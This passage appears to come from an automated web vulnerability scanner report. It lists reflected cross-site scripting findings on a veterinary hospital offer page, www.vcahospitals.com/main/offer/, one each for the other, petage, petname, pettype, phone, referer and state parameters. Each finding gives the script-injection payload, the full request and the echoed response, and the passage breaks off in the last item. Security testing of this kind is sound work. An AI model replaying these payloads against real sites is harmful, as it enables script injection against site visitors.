GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=91c04"><script>alert(1)</script>eabbcd649dd&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ug4maua9n8npvts3q702mnacq3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
/www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=91c04"><script>alert(1)</script>eabbcd649dd&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A
...[SNIP]...

2.69. http://www.vcahospitals.com/main/offer/ [petage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d43"><script>alert(1)</script>c56d9dd6dc2 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=79d43"><script>alert(1)</script>c56d9dd6dc2&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=beecinp0q16pijh2d7fv3lo156; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
hospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=79d43"><script>alert(1)</script>c56d9dd6dc2&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-6606
...[SNIP]...

2.70. http://www.vcahospitals.com/main/offer/ [petname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62a5"><script>alert(1)</script>8bc90a2171d was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=d62a5"><script>alert(1)</script>8bc90a2171d&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:44 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t61kfqf8iod9f3ov4rimn1b057; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=d62a5"><script>alert(1)</script>8bc90a2171d&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%
...[SNIP]...

2.71. http://www.vcahospitals.com/main/offer/ [pettype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6359"><script>alert(1)</script>440a5a05f49 was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=c6359"><script>alert(1)</script>440a5a05f49&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=leokka2dvj8dli9epn3okqvbc4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=c6359"><script>alert(1)</script>440a5a05f49&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddre
...[SNIP]...

2.72. http://www.vcahospitals.com/main/offer/ [phone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5b4"><script>alert(1)</script>0df15c3c289 was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=9b5b4"><script>alert(1)</script>0df15c3c289&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4pt8m6oa7m32ci7i96uoh1kn01; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=9b5b4"><script>alert(1)</script>0df15c3c289&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d17
...[SNIP]...

2.73. http://www.vcahospitals.com/main/offer/ [referer parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43ae"><script>alert(1)</script>6f18be7751f was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3Fc43ae"><script>alert(1)</script>6f18be7751f HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:14 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
rm action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3Fc43ae"><script>alert(1)</script>6f18be7751f" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.74. http://www.vcahospitals.com/main/offer/ [state parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce804"><script>alert(1)</script>ee024cf54a8 was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?=3&state=FLce804"><script>alert(1)</script>ee024cf54a8&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
